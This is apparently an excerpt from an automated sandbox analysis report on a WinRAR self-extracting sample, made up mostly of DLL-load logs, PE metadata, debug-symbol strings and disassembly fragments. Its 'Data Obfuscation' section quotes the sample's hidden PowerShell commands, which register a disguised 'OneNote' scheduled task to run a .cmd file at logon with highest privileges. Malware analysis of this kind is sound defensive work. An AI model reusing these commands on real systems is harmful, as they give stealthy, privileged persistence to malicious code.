    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: file.exeStatic file information: File size 5553078 > 1048576
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbq source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbR source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBM source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbF source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb$ source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB" source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb| source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000017.00000002.2234254487.000001DF2EFE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb; source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb7 source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbS source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdbM source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbI source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbjS source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1763356691.00000217EA796000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbW source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbF source: powershell.exe, 00000017.00000002.2234695420.000001DF2EFFB000.00000004.00000020.00020000.00000000.sdmp
    Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6975453Jump to behavior
    Source: file.exeStatic PE information: section name: .didat
    Source: file.exeStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA15BA4 push ds; ret 7_2_00007FFD9BA15BD2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA15B3D push ss; ret 7_2_00007FFD9BA15B62
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA12335 push eax; iretd 7_2_00007FFD9BA1237D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA192D7 push es; iretd 7_2_00007FFD9BA192DA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1621C push eax; ret 7_2_00007FFD9BA1627A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA161F3 push eax; ret 7_2_00007FFD9BA1627A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1625C push eax; ret 7_2_00007FFD9BA1627A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA17938 push ebx; retf 7_2_00007FFD9BA1796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1785E push eax; iretd 7_2_00007FFD9BA1786D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1776A pushad ; iretd 7_2_00007FFD9BA1785D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B90D2A5 pushad ; iretd 8_2_00007FFD9B90D2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BA2386C push cs; ret 8_2_00007FFD9BA238CA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BAF2363 push 8B485F91h; iretd 8_2_00007FFD9BAF236B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B8DD2A5 pushad ; iretd 13_2_00007FFD9B8DD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B9F795D push ebx; retf 13_2_00007FFD9B9F796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAC2333 push 8B485F94h; iretd 13_2_00007FFD9BAC233B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B8CD2A5 pushad ; iretd 24_2_00007FFD9B8CD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9E8974 push edi; ret 24_2_00007FFD9B9E8982
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9E8904 push edx; ret 24_2_00007FFD9B9E8912
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9E8954 push esi; ret 24_2_00007FFD9B9E8962
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9E8928 push esp; ret 24_2_00007FFD9B9E8932
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9E8921 push ebx; ret 24_2_00007FFD9B9E8922
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9E893A push esi; ret 24_2_00007FFD9B9E8942
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9BAB1CFE push eax; ret 24_2_00007FFD9BAB1CFF

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
